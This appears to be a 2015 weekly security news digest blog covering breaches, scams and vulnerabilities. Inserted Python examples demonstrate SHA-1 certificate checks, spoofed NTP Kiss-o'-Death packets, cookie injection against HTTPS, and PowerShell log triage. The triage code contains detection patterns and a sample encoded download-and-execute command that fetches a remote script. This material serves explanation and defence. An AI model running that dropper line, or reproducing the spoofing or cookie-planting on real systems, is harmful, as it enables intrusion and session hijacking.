Sunday, October 25, 2015

Issue 35 - Week of Oct 19th

1.       TalkTalk hack hits up to 4 million in unencrypted data theft: UK ISP TalkTalk says customers' credit-card and banking details may have been accessed by hackers after a "sustained cyber-attack" on its website last week. Following its second major breach in the past year, the British broadband provider has admitted, in vague terms, that it may have failed to protect customers' financial data properly. Among the details it says may have been "accessed" are customers' names, addresses, dates of birth, email addresses, telephone numbers, account information, and credit-card and bank-account details. TalkTalk customers were targeted by fraudsters earlier this year following a breach of its internal security procedures linked to its use of a third-party call center.

2.       WikiLeaks posts data from CIA director's email account: Last week, hackers accessed the CIA Director's personal AOL email account using social engineering. One of them posed as a Verizon technician, called a Verizon employee and talked him into handing over the personal information needed to reset the Director's password. The hackers were able to read sensitive government documents stored as attachments in the personal account because the spy chief had forwarded them from his work email. In 2012 another CIA director had to step down for mishandling classified information, allegedly by storing it in a Gmail drafts folder; he avoided jail by pleading guilty but was fined $100,000.

3.       Government seeks to outlaw car hacking: A House committee will consider automotive safety reforms that, among other proposed changes, would make it illegal to hack vehicles, with penalties of up to $100k. A group of researchers argues that hackers make cars safer and should not be banned from tinkering. Car hacking is not just about remotely disabling a vehicle's functions; it could also be used for surveillance and sabotage. As discussed in the issue of 27th July, Chrysler recalled 1.4M vehicles for a bug fix following a demonstrated hack, and the hackers released a video of their demo.

4.       Just how many websites are vulnerable because of SHA-1: Some certificate authorities are still issuing digital certificates signed with the SHA-1 hash algorithm, despite recent research showing that the cost of undermining it is not beyond criminals' budgets. Browser makers Google, Microsoft and Mozilla have announced plans to stop accepting SHA-1 SSL certificates by 2017. But researchers recently called for this deadline to be brought forward, after estimating that the cost of producing a SHA-1 collision is much lower than initially thought, and well within reach of cybercriminal budgets. They estimate that by renting Amazon servers for approximately $75K USD, attackers can compute a SHA-1 collision. Note that SHA-1 is a hash function, not an encryption algorithm: the risk is that a colliding pair lets an attacker obtain a CA signature on one certificate and transplant it onto another, not that encrypted traffic is decrypted.
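Checking which signature algorithm a certificate actually carries is the practical first step. The script below is an added example, not code from the article or from any browser vendor: it parses just enough DER to read the signatureAlgorithm OID of an X.509 certificate (so it also works on a real DER file, for example the output of `openssl x509 -outform DER`), and the two certificates it inspects are constructed skeletons with a dummy tbsCertificate and an empty signature, built only so the script runs offline.

```python
"""Flag X.509 certificates whose outer signature uses SHA-1.

Added example, not code from the article. The DER walker reads only the
certificate's signatureAlgorithm field; the sample certificates are
constructed skeletons (dummy tbsCertificate, empty signature).
"""

# OIDs of common signature algorithms; the SHA-1 ones are the problem.
SIG_ALG_NAMES = {
    "1.2.840.113549.1.1.5": "sha1WithRSAEncryption",
    "1.2.840.113549.1.1.11": "sha256WithRSAEncryption",
    "1.2.840.10045.4.1": "ecdsa-with-SHA1",
    "1.2.840.10045.4.3.2": "ecdsa-with-SHA256",
}
SHA1_OIDS = {"1.2.840.113549.1.1.5", "1.2.840.10045.4.1"}


def read_tlv(buf, pos):
    """Parse one DER tag-length-value at pos. Returns (tag, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: next n bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(raw):
    """Turn DER OBJECT IDENTIFIER content bytes into dotted notation."""
    first = raw[0]
    arcs = [first // 40, first % 40]
    value = 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                    # high bit clear ends a base-128 arc
            arcs.append(value)
            value = 0
    return ".".join(str(a) for a in arcs)


def signature_algorithm(cert_der):
    """Return the dotted OID of the certificate's signatureAlgorithm."""
    tag, cert, _ = read_tlv(cert_der, 0)    # Certificate ::= SEQUENCE
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, _tbs, pos = read_tlv(cert, 0)        # tbsCertificate, skipped
    tag, alg_id, _ = read_tlv(cert, pos)    # signatureAlgorithm ::= AlgorithmIdentifier
    if tag != 0x30:
        raise ValueError("missing AlgorithmIdentifier")
    tag, oid, _ = read_tlv(alg_id, 0)       # algorithm OBJECT IDENTIFIER
    if tag != 0x06:
        raise ValueError("AlgorithmIdentifier does not start with an OID")
    return decode_oid(oid)


def is_sha1_signed(cert_der):
    return signature_algorithm(cert_der) in SHA1_OIDS


def der(tag, content):
    """Minimal DER encoder, used only to build the constructed sample certificates."""
    n = len(content)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + content


def fake_cert(sig_oid_bytes):
    """Constructed certificate skeleton: dummy TBS, given AlgorithmIdentifier, empty signature."""
    tbs = der(0x30, der(0x02, b"\x01"))                          # SEQUENCE { INTEGER 1 }
    alg = der(0x30, der(0x06, sig_oid_bytes) + der(0x05, b""))   # OID + NULL params
    sig = der(0x03, b"\x00")                                     # BIT STRING, 0 unused bits
    return der(0x30, tbs + alg + sig)


SHA1_RSA = bytes.fromhex("2a864886f70d010105")     # 1.2.840.113549.1.1.5
SHA256_RSA = bytes.fromhex("2a864886f70d01010b")   # 1.2.840.113549.1.1.11

if __name__ == "__main__":
    for name, cert in (("legacy", fake_cert(SHA1_RSA)), ("modern", fake_cert(SHA256_RSA))):
        oid = signature_algorithm(cert)
        print(name, SIG_ALG_NAMES.get(oid, oid), "REPLACE" if is_sha1_signed(cert) else "ok")
```

Only the outer signature algorithm matters for this check; a self-signed SHA-1 root is harmless because roots are trusted by identity, not by their signature, so scan the leaf and intermediate certificates a server sends.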

5.       Thousands of e-commerce Magento websites struck with Guruincsite malware: Websites running the Magento content management system are being infected with malware in a fresh campaign which has impacted thousands of domains in a matter of days. The attack involves the injection of malicious scripts through iframes from guruincsite.com, which serves the Neutrino exploit kit. Google has already blacklisted almost 8,000 infected websites; removing the malicious scripts and resubmitting the cleaned sites to Google for review should lift the blacklisting, but unless the injection point is also closed the site will simply be reinfected. The Magento content management system, tailored for e-commerce, is used by over 200,000 companies worldwide.

6.       Computer clocks can be easily scrambled, undermining encryption and bitcoin trades: Researchers from Boston University say they have found several flaws in NTP that could undermine encrypted communications and even jam up bitcoin transactions. One of the problems they found is that an attacker can cause an organization's servers to stop checking the time altogether. NTP has a rate-limiting mechanism, nicknamed the "Kiss o' Death" (KoD) packet, that tells a client to stop repeatedly querying a server in case of a technical problem. When that packet is received, systems may stop querying the time for days or years, according to a summary of the research. The big issue they found is that an attacker can spoof a Kiss o' Death packet, making it appear to have come from a server that is in trouble when it is actually fine. A client that stops updating its clock drifts, and anything that depends on accurate time, such as certificate validity checks, drifts with it.
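The exchange described above, as an added example that is not code from the Boston University research or from any NTP implementation: it builds NTPv4 packets with `struct`, sends one client request, then delivers a forged KoD from an off-path attacker (who never saw the request) and a genuine KoD from the server. The server, timestamps and back-off interval are constructed. The defence shown, honouring a KoD only when its origin timestamp echoes the transmit timestamp of a request the client actually sent, is the standard origin check an NTP client should apply to every reply.

```python
"""NTP Kiss-o'-Death (KoD) spoofing and the origin-timestamp check.

Added example, not code from the research or from any NTP daemon.
Packets, timestamps and the back-off computation are constructed.
"""
import struct

# LI/VN/Mode, stratum, poll, precision, root delay, root dispersion,
# reference ID, then reference/origin/receive/transmit 64-bit timestamps.
NTP_FORMAT = "!BBbbII4sQQQQ"
NTP_LEN = struct.calcsize(NTP_FORMAT)       # 48 bytes
MODE_CLIENT, MODE_SERVER = 3, 4
KOD_STRATUM = 0                             # KoD = stratum 0 + ASCII "kiss code" in refid


def build_packet(mode, stratum=2, poll=6, refid=b"\0\0\0\0",
                 origin=0, receive=0, transmit=0):
    li_vn_mode = (0 << 6) | (4 << 3) | mode  # leap 0, version 4
    return struct.pack(NTP_FORMAT, li_vn_mode, stratum, poll, -20, 0, 0, refid,
                       0, origin, receive, transmit)


def parse_packet(raw):
    if len(raw) < NTP_LEN:
        raise ValueError("short NTP packet")
    f = struct.unpack(NTP_FORMAT, raw[:NTP_LEN])
    return {"mode": f[0] & 0x07, "stratum": f[1], "poll": f[2], "refid": f[6],
            "origin": f[8], "transmit": f[10]}


def is_kod(pkt):
    """A KoD is a server-mode reply with stratum 0 and a printable kiss code such as b'RATE'."""
    return (pkt["mode"] == MODE_SERVER and pkt["stratum"] == KOD_STRATUM
            and pkt["refid"].isalpha())


class NtpClient:
    """Minimal client state: the transmit timestamp of the outstanding request."""

    def __init__(self):
        self.pending_xmt = None
        self.backoff_until = None

    def send_request(self, now_ts):
        self.pending_xmt = now_ts
        return build_packet(MODE_CLIENT, transmit=now_ts)

    def handle_reply(self, raw, now_ts, check_origin=True):
        """'dropped' if the reply does not answer our request, 'backoff' if a KoD
        was honoured (the client stops querying), 'time' for a normal reply."""
        pkt = parse_packet(raw)
        if check_origin and pkt["origin"] != self.pending_xmt:
            return "dropped"        # not an answer to anything we sent: spoofed or stale
        if is_kod(pkt):
            # The KoD's poll field tells the client how long to stay quiet;
            # a large value is what turns a rate limit into a denial of service.
            self.backoff_until = now_ts + (1 << pkt["poll"])
            return "backoff"
        return "time"


def run_demo(check_origin):
    """Client sends one request; a forged KoD and then a genuine KoD arrive."""
    client = NtpClient()
    request = client.send_request(now_ts=0x0001_0000_0000_0000)   # constructed timestamp
    xmt = parse_packet(request)["transmit"]
    # Off-path attacker knows the server address but not our transmit timestamp.
    forged = build_packet(MODE_SERVER, stratum=KOD_STRATUM, poll=17,
                          refid=b"RATE", origin=0x1234)
    genuine = build_packet(MODE_SERVER, stratum=KOD_STRATUM, poll=17,
                           refid=b"RATE", origin=xmt)
    later = xmt + 1
    return {
        "forged": client.handle_reply(forged, later, check_origin),
        "genuine": client.handle_reply(genuine, later, check_origin),
    }


if __name__ == "__main__":
    print("client without origin check:", run_demo(check_origin=False))
    print("client with origin check:   ", run_demo(check_origin=True))
```

The origin check does not help against an attacker who can see the client's traffic; for that case the fix is authenticated NTP or limiting how long a single KoD may silence the client.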

7.       “I am stranded without any money, so I was wondering if I could get a quick loan of $1,850 from you or any amount you can afford, if not all,” read the mail from the hacked account. Hackers appear to have adopted a new modus operandi to make people transfer money to their accounts. Recently, somebody believed to be from Ukraine hacked the Yahoo mail account of a journalist and created a similar-looking ID on Microsoft's Outlook web mail service. The hacker used the contacts from the hacked Yahoo account to send mails to the person's friends and relatives, asking for money from the newly created ID. The mail typically claims that the sender is stuck in a foreign country, that his debit and credit cards are not working and that he is in dire need of money. Since the hacker used a different account, the original user did not know about the mails sent in his name.

8.     Unbelievably simple scam costs ONGC ₹197 crore: Another classic case of typosquatting. 'patel_dv@ongc.co.in' is a genuine ONGC address. The hackers used a lookalike domain (ognc.co.in) to create the fake ID 'patel_dv@ognc.co.in'; note that only two letters are transposed. ONGC was engaged in a business transaction with Saudi Arabia-based oil company Aramco. Using the fake ID, the hackers corresponded with Aramco and instructed them to make the payment to a Bangkok bank instead of the regular State Bank of India account. A case has been registered with the cybercrime police station.

9.   Cybersecurity skills gap continues to grow: Last week the Government's Digital India initiative appointed an ethical hacker as its new brand ambassador. This in a way acknowledges hacking as an acceptable activity, a legitimate career option and an honest way to earn one's livelihood. A deeper look at the colleges and institutes that offer ethical hacking courses shows that ethical hacking in India is making large strides, but there is still some distance to cover. Worldwide market indicators show the need for as many as 4.25 million security professionals by 2017, representing a potential 47% shortage in qualified personnel.


10.   State-sponsored attack? Facebook will now tell you 'You've been hacked': Facebook has started to notify users when it suspects they have been targeted by government-sponsored hackers rather than by run-of-the-mill cybercriminals. Facebook won't reveal how it tells that a state-sponsored hacker is targeting a particular user, although there are numerous known malware families suspected to have been created by government-backed hackers, such as Stuxnet (thought to have been built by the US), Duqu, DarkSeoul (supposedly from North Korea), China's ShadyRAT and Russia's The Dukes.

Sunday, October 18, 2015

Issue 34 - Week of Oct 12th

1.       Angler Exploit Kit blasts Daily Mail visitors via malvertising: There has been a lot of buzz about the powerful Angler Exploit Kit in recent days. This time it struck the popular British newspaper the Daily Mail, which accounts for 156 million monthly visits. Malvertising works by inserting a malicious advert into a publisher's website through the ad network the publisher uses. When the page loads, the ad is displayed and performs its nefarious action without the user having to click on it. In the issue dated Aug 16th we discussed Yahoo being misused to launch malvertising.

2.       Netgear publishes patched firmware for routers under attack: After a pair of very public disclosures in the last two weeks, Netgear published new firmware for vulnerabilities in its routers that have been publicly exploited. Researchers discovered that as many as 10,000 routers had been taken over. The risk to business and home users is that an attacker in control of a router can redirect incoming and outgoing traffic by changing its DNS configuration, or sit in a man-in-the-middle position and spy on supposedly protected traffic. Redirecting users through hijacked DNS is known as pharming; comparing the router's configured DNS servers with the ones you expect is the quickest way to spot it.

3.       All Flash versions vulnerable to remote-control attack until next week: Adobe has announced that it is working on a new update for Flash to fix a critical vulnerability that is currently being exploited. All current versions of Flash are vulnerable to the exploit, which could allow an attacker to take control of the affected machine. Earlier this year, Facebook's CISO called for Flash to be killed off. Almost every week a new flaw is found and patched by Adobe, and in some cases Flash has been the basis for advanced persistent threats targeting major industries.

4.       Wealth of personal data found on used electronics purchased online: Varying amounts and types of residual data have been found on used mobile devices, hard disk drives and solid state drives purchased online from Amazon, eBay and Gazelle.com. Based on an examination of 122 pieces of second-hand equipment, 48 percent of the hard disk drives and solid state drives contained residual data, while thousands of leftover emails, call logs, texts/SMS/IMs, photos and videos were retrieved from 35 percent of the mobile devices. Most people attempt in some way or another to delete their data from electronic equipment. But while those deletion methods are common and seem reliable, they are not always effective at removing data permanently: a normal delete or quick format only removes the file-system references and leaves the underlying blocks recoverable until they are overwritten.

5.       After spike in Windows infections, Microsoft steps in to tackle TeslaCrypt ransomware: Microsoft has released a rescue tool for the thousands of Windows machines that were infected in August by the file-encrypting ransomware TeslaCrypt. Along with last week's 'Patch Tuesday' updates, Microsoft upgraded its Malicious Software Removal Tool to tackle TeslaCrypt. TeslaCrypt appeared on the radar in early 2015, gaining notoriety for targeting gamers. After infecting a machine, TeslaCrypt searches for specific file types, encrypts them with AES-256 and demands payment in Bitcoin in exchange for the key to unlock the files. A removal tool stops the malware but does not decrypt files it has already encrypted; offline backups remain the only reliable recovery path.

6.       Google, Facebook and peers criticize CISA bill ahead of Senate consideration: A trade group representing Facebook, Google, Yahoo and other tech and communications companies has come out strongly against CISA, the Cybersecurity Information Sharing Act of 2015, a controversial US bill intended to encourage businesses to share information about cyber-threats with the government. Critics are concerned that the provisions of the bill could be used by companies to hand over customers' personal data to government intelligence agencies such as the National Security Agency. Cyber-threat information-sharing would not necessarily have prevented several recent attacks on government agencies, according to experts.

7.       US says no to encryption law, for now: The US government has decided not to call for new legislation to force tech companies to decode the encrypted communications of their customers, for now at least. With more traditional methods of communication there is usually a way for the service provider to give police, with a warrant, access to the data. But end-to-end encryption means the only place the message is unscrambled is on the smartphone itself. The FBI Director said the issue with encryption was a clash between the need for safety and security on the internet and public safety. "Those two values we hold dear are crashing into each other. I don't know what the answer is," he said.

8.       The government of Uganda used sophisticated surveillance technology: It was used to target opposition members, journalists and activists, according to an investigation by a London-based watchdog. The government's weapon of choice was a highly invasive form of spyware called FinFisher, which is capable of remotely monitoring computers, smartphones and other equipment in real time, and which has been sold on the open market to repressive governments.

9.       A shadowy Russian teenager has emerged as the new threat to Indian banks: He is said to hack ATMs using 'Tyupkin', malware that can force cash machines into maintenance mode and spew out currency notes. The modus operandi involves removing the side or back panel of the ATM, plugging in a USB drive and rebooting the machine. Once infected, a few simple keystrokes cause the cash to flow out. An ethical hacker showed that attackers can infiltrate banks, get behind the firewalls and move from one ATM to another. He showed that attackers can use PowerShell, which, he said, none of the bank systems detected. PowerShell lets an attacker write malware that signature-based antivirus tools do not flag: it is a plain text script rather than a binary, but it has the full capabilities of malware. The practical countermeasure is to log what PowerShell actually executes (script block and module logging) and alert on suspicious content such as encoded commands and download-and-execute one-liners, rather than relying on antivirus alone.
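What that logging-based detection looks like in practice, as an added example that is not the ethical hacker's tooling, any bank's detection or code from the article: it triages constructed stand-ins for PowerShell script block log records (the field layout is ours, not Microsoft's event 4104 schema), decodes `-EncodedCommand` payloads, which are base64 of UTF-16LE text, and scores each record against indicators typical of droppers. The hosts, users, indicator list and thresholds are all assumptions.

```python
"""Hunting for malicious PowerShell in script-block log records.

Added example, not code from the article. The sample records, the
indicator list and the scoring threshold are constructed assumptions.
"""
import base64
import re

# Indicator families that rarely appear in legitimate admin scripts but are
# staples of download-and-execute PowerShell droppers.
SUSPICIOUS = [
    r"\bIEX\b|Invoke-Expression",
    r"DownloadString|DownloadFile|Net\.WebClient",
    r"-nop\b|-NoProfile",
    r"-w(indowstyle)?\s+hidden",
    r"FromBase64String",
    r"Invoke-Mimikatz|Invoke-Shellcode",
]

# -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext hidden behind -EncodedCommand, or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score(script_text):
    """Count distinct indicator families hit."""
    hits = [p for p in SUSPICIOUS if re.search(p, script_text, re.IGNORECASE)]
    return len(hits), hits


def triage(record):
    """record: dict with 'host', 'user', 'script' (logged script block or command line)."""
    text = record["script"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + "\n" + decoded      # scan the wrapper and the hidden payload
    n, hits = score(text)
    verdict = "ALERT" if n >= 2 else ("review" if n == 1 else "ok")
    return {"host": record["host"], "user": record["user"], "score": n,
            "hits": hits, "decoded": decoded, "verdict": verdict}


def encode_command(ps):
    """Same encoding attackers use to build -EncodedCommand arguments."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real log data).
SAMPLE_RECORDS = [
    {"host": "atm-mgmt-01", "user": "svc_backup",
     "script": "Get-ChildItem C:\\Backups | Where-Object { $_.Length -gt 1GB }"},
    {"host": "atm-mgmt-02", "user": "Administrator",
     "script": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
               + encode_command("IEX (New-Object Net.WebClient)"
                                ".DownloadString('http://198.51.100.7/t.ps1')")},
    {"host": "branch-ws-17", "user": "teller",
     "script": "Invoke-Expression (Get-Content .\\stage2.txt -Raw)"},
]


def run(records=SAMPLE_RECORDS):
    return [triage(r) for r in records]


if __name__ == "__main__":
    for r in run():
        print(f"{r['verdict']:6} {r['host']:12} {r['user']:14} score={r['score']} {r['hits']}")
```

Decoding the encoded command before matching is the part that matters: the wrapper alone only shows `-NoProfile -WindowStyle Hidden`, while the payload is where the download-and-execute shows up.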

10.   Recently researchers discovered a new Facebook post being shared that offered an iPhone 6S for only £1. Targets of this scam typically see a Facebook post that has been shared by their friends and other victims of the scam. Clicking on the post redirects to a fake news article on igadgete[.]com. The article claims that a "trusted distribution partner" of Apple named "FunkyClock" is giving away iPhone 6S phones for £1 as part of a new promotion. Always be wary of an offer that seems too good to be true, because it almost certainly is fake. If in doubt, Raytheon | Websense suggests the following: never enter your card details into websites that you do not know or trust, and if something doesn't feel right, stop what you're doing and seek help.

Sunday, October 11, 2015

Issue 33 - Week of Oct 5th

1.       Suspected cyberespionage: Uber checks connections between hacker and Lyft: Uber and Lyft are fierce competitors with hugely different valuations; Uber is valued at $51 billion while Lyft is at $2.5 billion. Uber was hacked 8 months ago and 50,000 records of drivers' names and license numbers were stolen. Uber is now focusing its legal efforts on identifying the hacker, who according to sources can be traced to the CTO of Lyft.

2.       Suspected Iran-based hacker group creates network of fake LinkedIn profiles: Researchers uncovered a network of fake LinkedIn profiles; these convincing profiles form a self-referencing network of seemingly established LinkedIn users. Researchers believe the purpose of this network is to target potential victims through social engineering. Most of the legitimate LinkedIn accounts connected to the fake accounts belong to individuals in the Middle East, who could be the potential victims. The level of detail in the profiles suggests that the threat actors invested substantial time and effort into creating and maintaining these personas. The photos used in the fake accounts are likely of innocent individuals who have no connection with the group.

3.       Scottrade suffers hack; 4.6M customers notified of breach: The brokerage firm confirmed the attack but said the focus of the attack was client contact details rather than financial information. Although Social Security numbers, email addresses and other sensitive data were contained in the system that was accessed, it appears that contact information was the focus of the incident, the company statement read.

4.       HTC says monthly Android security updates are unrealistic: The recent Stagefright vulnerability, which could affect every Android device, may have been a blessing in disguise for Android users. Responding to the situation, Google announced monthly security updates for its Nexus phones. Samsung also committed to 'near monthly' updates and LG has followed suit. HTC, however, has not: the company said it will push for them, but that it is unrealistic for anyone to guarantee updates every month. The Android ecosystem (Google, hardware makers and telcos) will sooner or later have to put together regular updates to keep pace with modern-day security threats.

5.       Cost of cybercrime climbs to $6.8m per firm in Japan, $3.4m in Australia: The average annual cost of cybercrime per organization across seven countries (Japan, Australia, Germany, Brazil, US, UK and Russia) has increased to $7.7 million in 2015, with companies taking 46 days on average to resolve a cyber-attack. According to the study, the average annualized cost of cybercrime in Japan climbed 14 percent to an estimated $6.81 million. In Australia, this figure increased 13 percent to $3.47 million. As organizations increasingly invest in new technologies like mobile, cloud and the Internet of Things, the attack surface for sophisticated adversaries continues to expand.

6.       Report finds many nuclear power plant systems 'insecure by design': A study of the information security measures at civilian nuclear energy facilities around the world found a wide range of problems at many facilities that could leave them vulnerable to attacks on industrial control systems, potentially causing interruptions in electrical power or even damage to the reactors themselves. The study found that many nuclear power plants' systems were "insecure by design" and vulnerable to attacks that could have wide-ranging impacts in the physical world, including the disruption of the electrical power grid and the release of "significant quantities of ionizing radiation".

7.       Samsung says customer payment data not affected by hack attack: LoopPay, a mobile-payments technology startup which Samsung acquired in February to set up its payment system, was hit by a hacking incident. Samsung says that customers who use the payment system were not affected by the attack. A government-affiliated Chinese hacker group known as the Codoso Group or Sunshock Group was responsible for the attack, The New York Times reported. LoopPay believes the hackers were trying to steal the company's magnetic stripe technology, the primary reason Samsung bought the company.

8.       Who is responsible for a driverless car accident? Google, Mercedes and Volvo say they will accept full liability for accidents involving their driverless cars, since in this case the manufacturer of the technology is the driver. However, they would only accept liability for an accident if it resulted from a flaw in the car's design. If the customer used the technology in an inappropriate way then the user will be liable, and if a third-party vehicle causes the crash, then that party would be liable. The critical question is who would be responsible when a crash is due to a cyber-attack.

9.     Cybersecurity skills gap continues to grow: Frenzied activity in the Indian internet space, especially the mushrooming of start-ups, has once again brought the shortage of ethical hackers to the fore. The industry estimates the availability of ethical hackers at a meagre 15,000-17,000, against the 50,000-70,000 cyber security professionals needed per year. An ethical hacker is a computer expert who breaks into a network, with the owner's permission, to test or evaluate its vulnerabilities, without malicious intent. Industry estimates that by 2020 the annual requirement will rise to about 1 million cyber security professionals.


10.   Chinese hackers have been tracked using the seven-stage kill chain: They 'recon' their victims using watering hole attacks, in which they track their victims' online activity and the websites the victims visit. Once a list of often-visited websites has been collected, the attacker plants code (typically a small redirect script) in these trusted websites that sends users to malicious sites, from where the visitors are served an exploit kit in order to achieve the true goal: compromising a victim's system. Once inside a targeted network, the hackers tend to go for the domain controller in order to steal credentials and gain access to other network areas which may store sensitive data.


Sunday, October 4, 2015

Issue 32 - Week of Sep 28th

1.       Experian leaks info of 15 million T-Mobile credit applications: Experian, one of the major credit rating bureaus that companies use to conduct credit checks, has exposed the personal information of T-Mobile consumers. T-Mobile has revealed that the hack exposed its customers' personal details, including social security numbers, dates of birth and various identification numbers, including passport and driver's license numbers. Experian said the incident is "isolated" and limited to consumers who applied for T-Mobile USA services between Sept. 1, 2013 and Sept. 16, 2015.

2.       T-Mobile CEO John Legere did what all CEOs should do after a hack: Promptly following the company statement, Legere got on Twitter and sent out a tweet that read, “One of our vendors, Experian, experienced a data breach. See what we’re doing about it,” with a link to the company’s initial announcement. But Legere’s engagement didn’t stop there: he then proceeded to answer questions from T-Mobile customers in response to his tweet. These tweets address what everyone potentially affected by a massive data breach yearns for: answers, personal interaction and attention. The best thing a company can do after an attack is act like it cares. Seeing the CEO of a giant corporation get on social media and interact with customers is certainly refreshing and the way to go.

3.       Every Android device is vulnerable to newly discovered bugs: With two new "Stagefright" vulnerabilities discovered, almost every Android device ever released is vulnerable to malicious hackers. More than a billion Android smartphones and tablets are at risk of being compromised by the new bugs if their owners so much as preview video or audio files that have been specially crafted to exploit the vulnerability. Google has responded positively and will release a patch for these vulnerabilities by Oct 5th, but the question about the Android ecosystem remains: the update process is very slow because phone makers are responsible for pushing software updates to customers.

4.       A researcher has discovered a flaw in Apple's Gatekeeper: Gatekeeper is a feature Apple built to help protect Macs from malware and misbehaving apps downloaded from the Internet. The flaw is that Gatekeeper checks the signature of the app the user launches but not the code that app loads afterwards: a signed app can load other software or components that have been replaced with malware, without any separate verification stage. In his testing, the researcher found that a signed Photoshop installer would load plug-ins from another directory that had been swapped out for malware, without any further notification. He also tested with an Apple-distributed program that he declined to disclose at Apple's request.

5.       Critical WinRAR vulnerability places 500 million users at risk: An unpatched, critical remote code execution flaw in WinRAR's SFX (self-extracting archive) feature has been disclosed by a researcher, who posted his findings on Full Disclosure; the flaw reportedly affects WinRAR SFX version 5.21. Granted a CVSS score of 7.4, the vulnerability could allow attackers to execute code on victim machines, leading to control, surveillance and potentially data theft. WinRAR's team disputes the finding. The caveat for defenders is that an SFX archive is itself an executable, so a user who runs an untrusted SFX is already running attacker-supplied code; the practical advice is the same either way: do not open archives or executables from untrusted sources.

6.       Russian developer of the notorious "Citadel" malware sentenced to prison: Dimitry Belorossov, a.k.a. Rainerfox, has been sentenced to four years and six months in prison following his guilty plea to conspiring to commit computer fraud. Belorossov distributed and installed Citadel, sophisticated malware that infected over 11 million computers worldwide, onto victims' computers using a variety of infection methods, including malicious attachments to spam emails and commercial Internet ads containing malware or links to malware. Citadel was a "banking Trojan", designed to steal online banking credentials, credit card information, personally identifiable information and, ultimately, funds through unauthorized electronic transfers. Belorossov was arrested in Spain and extradited to the US.

7.       Cookies can facilitate attacks on secure web sites: CERT has issued a new advisory warning that cookies can be used to allow remote attackers to bypass a secure protocol (HTTPS) and reveal private session information, and that modern browsers, including Apple's Safari, Mozilla's Firefox and Google's Chrome, currently provide no protection against the attack vector. The root cause is that cookies carry no integrity or origin information: a cookie set over plain HTTP, or by a sibling subdomain, is sent to the HTTPS site that uses the same name and domain, so a network attacker who can inject an HTTP response can plant a cookie that the secure site will later accept. Research indicates that sites as important as Google and Bank of America are vulnerable to the technique. CERT advises that HSTS (HTTP Strict Transport Security) be implemented at the server level, with includeSubDomains, in order to mitigate the vulnerability. But even with that done, it remains for browser vendors to prevent subdomains from being used by attackers to inject malicious cookies.
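The injection described above, reproduced as an added example that is not the CERT advisory's or any browser's code: it uses the standard library's `http.cookiejar` as a stand-in for a browser cookie store, with constructed hosts, cookie names and a constructed attacker response. It shows that a cookie planted over plain HTTP with a `Domain` attribute is sent to the HTTPS site and, given a more specific `Path`, is listed ahead of the genuine `Secure` cookie; it then checks whether an HSTS header actually covers subdomains. Browsers have since added a rule that a non-secure origin may not overwrite a `Secure` cookie, so a current browser may behave differently from the jar below.

```python
"""Cookie injection against an HTTPS site, reproduced with the stdlib cookie jar.

Added example, not code from the CERT advisory or any browser. Hosts,
cookie names and the attacker's HTTP response are constructed.
"""
import email.message
import http.cookiejar
import urllib.request


class FakeResponse:
    """Just enough of an HTTP response for CookieJar.extract_cookies()."""

    def __init__(self, set_cookie_headers):
        self._msg = email.message.Message()
        for value in set_cookie_headers:
            self._msg["Set-Cookie"] = value

    def info(self):
        return self._msg


def store(jar, url, set_cookie_headers):
    """Simulate the browser receiving Set-Cookie headers in a response from url."""
    jar.extract_cookies(FakeResponse(set_cookie_headers), urllib.request.Request(url))


def cookie_header_for(jar, url):
    """Simulate the Cookie header the browser would attach to a request for url."""
    req = urllib.request.Request(url)
    jar.add_cookie_header(req)
    return req.get_header("Cookie")


def run_attack():
    jar = http.cookiejar.CookieJar()
    # 1. The user logs in over HTTPS; the bank sets a Secure session cookie.
    store(jar, "https://bank.example.com/login", ["sessionid=legit; Secure; Path=/"])
    # 2. The user later loads any plain-HTTP page under example.com. A network
    #    attacker injects a response that sets a cookie for the whole domain,
    #    with a more specific path than the genuine one (constructed).
    store(jar, "http://example.com/", ["sessionid=evil; Domain=.example.com; Path=/login"])
    # 3. What the HTTPS bank site now receives: the attacker's cookie first.
    return cookie_header_for(jar, "https://bank.example.com/login")


def parse_hsts(header_value):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains)."""
    max_age, include_sub = None, False
    for directive in header_value.split(";"):
        name, _, value = directive.strip().partition("=")
        if name.lower() == "max-age" and value.strip().isdigit():
            max_age = int(value)
        elif name.lower() == "includesubdomains":
            include_sub = True
    return max_age, include_sub


def hsts_blocks_injection(header_value):
    """HSTS only closes the HTTP injection path if it also covers the subdomains
    an attacker could set cookies from, i.e. includeSubDomains is present."""
    max_age, include_sub = parse_hsts(header_value)
    return bool(max_age) and include_sub


if __name__ == "__main__":
    print("Cookie header sent to the bank:", run_attack())
    print("max-age only:          ", hsts_blocks_injection("max-age=31536000"))
    print("with includeSubDomains:", hsts_blocks_injection("max-age=31536000; includeSubDomains"))
```

Even with `includeSubDomains`, HSTS only helps once the browser has seen the header over HTTPS (or has the domain preloaded); the first plain-HTTP visit is still exposed, and a sibling subdomain that is itself compromised can still set the cookie, which is the residual problem the advisory leaves to browser vendors.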

8.       As impactful as targeted attacks can be on organizations, non-targeted automated attacks using known vulnerabilities also pose a significant threat to the enterprise: It takes an average of 100 to 120 days to patch a flaw once it is found. Meanwhile, the probability of a vulnerability being exploited rises to 90 percent by the time the flaw has been known for 40 to 60 days. It's no surprise, then, that the volume of exploits has exploded in 2015.

